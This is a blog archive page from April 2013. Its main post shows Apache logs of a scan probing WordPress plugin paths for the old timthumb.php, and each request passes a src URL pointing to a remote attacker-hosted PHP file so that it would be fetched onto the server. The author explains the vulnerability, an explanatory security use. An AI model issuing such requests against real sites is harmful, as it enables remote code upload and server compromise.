One of today's attacks to this web server

Monthly Archives: April 2013


One of today’s attacks to this web server

Posted by in Computer Security,Crime,Technology | April 29, 2013

My web server was attacked by some guy in Germany last night. This is happens several times a day, so it’s usually not a concern. Ths time it happened while I was monitoring the server, so I had some fun looking at what the attacker was trying to do.

When I’m working on the computer at home I usually have a terminal window open in the background. In this window I’m usually watching all requests to my web server in real time. Most of time time I don’t pay attention to it (it’s mostly search engines crawling my domains), but sometimes you catch something interesting. This is an example of the kind of attacks hitting every web server on the Internet many times a day.

I was having dinner when I saw several strange requests to the Varnish server in front of my backend web server:

85.214.110.68 - - [28/Apr/2013:22:47:48 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 400 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:49 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:50 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:54 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:55 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:56 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:57 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:58 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:59 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:00 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:01 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:07 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:08 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:09 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:10 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:11 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:12 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:18 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:19 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:20 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:21 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:22 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:23 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:25 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
[...additional lines ommited...]

(Actually, these logs are from the backend web server running Apache. I’m not storing the request log on the Varnish machine.)

This guy was obviously scanning the web server for a script called timthumb.php. A quick search on Google shows that there was indeed a security problem with older versions of this program. It was possible to trick it into downloading a file from an attacker’s host and saving it into the server, where it could be later executed in order to compromise the system (see this link for details.)

Read more ›

My world-famous Spanish Omelette recipe

Posted by in Food,How-to | April 28, 2013

By popular request (popular meaning my coworkers’), here’s how I cook my Spanish omelette.

Ingredients (for 4-5 people)

spanish_omelette_2

  • 7-8 medium-sized potatos
  • 1 medium-size onion
  • 8 eggs
  • Olive oil (I used a 450cc bottle)
  • Salt
  • A bit of milk (1/3 of a small glass)

Keep reading for the full recipe.

Read more ›

Language settings in Google suck

Posted by in Rants,Technology | April 21, 2013

To the guys doing interface design at Google: for fuck’s sake, do something already about the language settings on your search interface.

This is an example of what I see everyday when I’m searching things on Google while logged to my account. Notice that the interface and the search results are in Japanese:

google-search-japanese-results Yes, I can read Japanese, but that’s not the point. My Google account is configured to display an English interface and provide search results from English sites, and I would expect these settings to work from a company like Google:

google-language-settings

Manually going to http://www.google.com/intl/en works, but I’d rather not have to enter the URL manually every time I need to search for something. To make things more fun, logging out from my Google account also displays an English interface with English search results, because that’s the primary language on my web browser.

I’m sure I’m not the first person complaining about this. Please do something already.